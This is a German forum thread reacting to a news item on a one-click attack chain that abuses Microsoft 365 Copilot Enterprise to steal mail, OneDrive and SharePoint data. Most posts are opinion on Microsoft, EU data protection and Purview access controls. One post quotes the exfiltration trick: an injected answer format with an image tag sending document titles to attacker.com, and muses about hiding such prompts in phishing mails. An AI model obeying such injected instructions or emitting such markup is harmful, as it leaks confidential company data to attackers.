News Gefährliche Angriffe: Ein Klick und M365-Copilot Enterprise wird zum Da­ten­dieb

mischaef

Kassettenkind
Teammitglied
Registriert
Aug. 2012
Beiträge
7.767
Forscher des Datensicherheitsunternehmens Varonis haben eine kritische Angriffskette entdeckt, mit der sich Microsoft 365 Copilot Enterprise zum Diebstahl vertraulicher Unternehmensdaten missbrauchen lässt. Betroffen sind Inhalte aus E-Mails, OneDrive und SharePoint. Für einen erfolgreichen Angriff genügt ein Klick.

Zur News: Gefährliche Angriffe: Ein Klick und M365-Copilot Enterprise wird zum Da­ten­dieb
 
  • Gefällt mir
Reaktionen: wesch2000, Weyoun, herrStreusalz und 11 andere
Der Vorfall zeigt erneut, wie anfällig KI-Systeme trotz gegenteiliger Verlautbarungen vieler Unternehmen weiterhin sind und dass ihr eigenständiger Zugriff auf sensible Daten sorgfältig abgewogen werden sollte.

"Nein!"
"Doch!"
"Ohh!"

xpad.c
 
  • Gefällt mir
Reaktionen: flo.murr, Falc410, gehirntot und 6 andere
Ich finde es genial, dass dieser hochkomplizierte Exploit ganz banal mit dem klassischen Link aus einer Mail beginnt.

Der Mensch wird wohl immer die größte Schwachstelle bleiben.
 
  • Gefällt mir
Reaktionen: flo.murr, Claus1221, herrStreusalz und 2 andere
Wer hätte das nur kommen sehen können?!
 
  • Gefällt mir
Reaktionen: flo.murr, herrStreusalz, TPD-Andy und 2 andere
ojemine da ist bestimmt schon viel flöten gegangen ohne das es bisher jemand kommen sah.
 
  • Gefällt mir
Reaktionen: herrStreusalz und TPD-Andy
Der Trick laut Quelle ist hier, dass im Suchprompt als Antwortformat sowas wie
<img src="bing.com/images/searchbyimage?imgurl=attacker.com/$TITLE"> vorgegeben wird. Das macht das Modell dann natürlich gerne und halbwegs zuverlässig (und halte ich an der Stelle nicht für eine Injection).

Spannend fände ich, wenn man den Angriff als eine wirkliche Injection ausführen könnte - zum Beispiel eine Phishing-Mail, in der der Prompt in der Klartext-Vorschau und nicht der HTML-Version steht. Vielleicht lässt sich das Modell mit so einem halb-unsichtbaren Prompt in den Suchergebnissen beeinflussen.

Dass so eine triviale HTML-Injection möglich war, ist das peinlichste daran - das war dann vielleicht eine Prompt Injection im Vibecode-Tool :)
 
  • Gefällt mir
Reaktionen: herrStreusalz
@Breaktivity ich weiß nicht, ob das so ein Toller Trick ist. Die M365-Copilot Enterprise Kunden werden es ganz bestimmt nicht so toll finden, wenn ihre Dokumente, Mails und Konversationen so ausgewertet und weiter verarbeitet werden.
Aber nun ja, es trifft ja anscheinend nicht die Europäer da der M365 und Copilot in der EU nicht zugelassen sind insofern kann es mir egal sein.
 
Der Puritaner schrieb:
@Breaktivity ich weiß nicht, ob das so ein Toller Trick ist. Die M365-Copilot Enterprise Kunden werden es ganz bestimmt nicht so toll finden, wenn ihre Dokumente, Mails und Konversationen so ausgewertet und weiter verarbeitet werden.
Also für Angreifer und Sicherheitsforscher ist es bestimmt was tolles :)
 
  • Gefällt mir
Reaktionen: herrStreusalz
Wer Microsoft's CoPiloten verwendet, kann seine Firma gleich in die Insolvenz schicken. Bei Agenturen mag das noch egal sein, bei Produktionsbetrieben, erst recht bei KRITIS, verbietet sich Microsoft im Grunde komplett.

Wenn es doch nur die BWLer lernen würden, die nichts anderes als Excel "studiert" haben und dann IT-Vorgaben machen... und natürlich die Beamten, die gar nichts gelernt haben -- schon gar nicht, sich Dinge selber beizubringen --, sondern vom Dienstherrn (=Steuerzahler) äußerst teuer angelernt und geschult werden müssen...
 
  • Gefällt mir
Reaktionen: herrStreusalz
|Moppel| schrieb:
Der Mensch wird wohl immer die größte Schwachstelle bleiben
Wwr weiß, ob wir nicht noch von KI-Agenten überholt werden 🙂
Könnte mir vorstellen, dass dieser Angriff auch leicht von Agenten getriggert werden kann, die den Posteingang verwalten...
 
@Der Puritaner, was meinst du damit, dass M356 und Copilot in der EU nicht zugelassen sind? Hast du da ne Quelle? Soweit ich weiß, gibt es jede Menge Unternehmen, die das hier nutzen.
 
@MoTKaD Zugelassen sind sie wohl, aber, dass die Programme nicht geeignet sind, die europäischen Datenschutzgesetze einzuhalten, hat der oberste Justiziar von Microsoft in Frankreich bei einer eidesstattlichen Anhörung vor einem Parlamentsausschuss vor nicht allzulanger Zeit öffentlich zugeben müssen. Und auch dabei hat er sich noch gewunden, wie ein Aal, und es brauchte einen gelassenen, erfahrenen und geduldigen älteren Herrn mit viel Zeit, die Frage so zu formulieren, dass kein Ausweichen mehr möglich war. Augenscheinlich war es dem Chefjustiziar persönlich sichtlich unangenehm, die Antwort geben zu müssen.
(In Deutschland gibt es aufgrund unserer parteipolitischen Mehrheitsverhältnisse solche Anhörungen vor parlamentarischen Ausschüssen in der Regel nur in nicht-eidesstattlicher Form, damit die Angehörten nicht gezwungen sind, die Wahrheit zu sagen.)

Frankreich:

Deutschland:
https://www.spiegel.de/politik/deut...ogen-dass-sich-die-balken-biegen-a-74316.html

Frankreich, das, wenn es will, eigenständiger denkt, als Deutschland, hat übrigens inzwischen einen langfristigen Ausstieg der Staatsverwaltung und Verteidigung aus Microsoft's Verträgen beschlossen. Da gibt es durchaus Parallelen zu China, das ein ähnliches Vorhaben bereits vor Jahren fertig umgesetzt hat.

In Deutschland ist dergleichen allerdings nicht zu befürchten. Deutschland oder auch die EU-Kommission haben nach über zehn Jahren den Knall noch nicht gehört. Es fehlt schlicht überall massiv an Kompetenzen, und das deutsche politische Beamtenrecht erlaubt genügend Schlupflöcher vom geleisteten Amtseid.
 
Zuletzt bearbeitet:
  • Gefällt mir
Reaktionen: Skorpion1976
als hätten uns die monatlichen sicherheitslücken in betriebssysteme nicht gereicht... kommen jetzt sicherheitslücken in KI, welche noch schlimmer als betriebssysteme sind :)
 
@mmdj das war doch leider nicht anders zu erwarten, das so etwas irgendwann passiert, zumal die Daten alle über Microsoft ausgewertet werden, wie soll sonst die KI Arbeiten und Vorschläge unterbreiten. das ist genauso wie mit Gemini.
Die KI arbeitet ja nicht für sich alleine auf dem Rechner.
 
Es gibt in AI eben noch kein Access Control. Alles was drin ist - egal ob im Modell selbst oder per Unternehmenszugriff (document grounding/sharepoint einbindung) ist dann für alle User verfügbar. Das ein Lagermitarbeiter nicht die Finanzdaten aus dem Vorstands-Sharepoint hätte sehen sollen, ist im Konzept nicht vorgesehen.

Die Abhilfe dafür dann eben mehrere AI's bzw. Agenten zu betreiben, die jeweils nur Fachidioten ihrer Abteilungen sind, killt dann wieder den Ansatz eine AI für alles zu haben.
 
Saint81 schrieb:
Es gibt in AI eben noch kein Access Control.
Das ist falsch. Copilot kann, mit Purview Labels in Verbindung mit Sharepoint und DLP allgemein, sehr detailliert begrenzt werden. Dazu noch die anderen Features nutzen, die andere LLMs untersagt und du kannst AI im Rahmen seiner Möglichkeiten, sicher nutzen.
ABER: das kostet alles Geld und zwar nicht zu knapp. Selbst die berühmte E5 Lizenz liefert nicht mehr alles, was du brauchst, um dem Herr zu werden. Aber es geht in der Theorie und sogar Praxis, wenn du genügend Münzen einwirfst.
 
Maggus-Desire schrieb:
Aber es geht in der Theorie und sogar Praxis, wenn du genügend Münzen einwirfst.
Oh, nice - danke für das Update.
Das scheine ich verpasst zu haben - ist aber neu oder?
 
Saint81 schrieb:
ist aber neu oder?
Definiere neu? Seit einem halben Jahr geht es in jedem Fall, weil wir es da in der Firma umgesetzt haben, da wir sonst Copilot nicht hätten einsetzen dürfen. Labels und co via Purview gibt es aber schon länger.
 
Zurück
Oben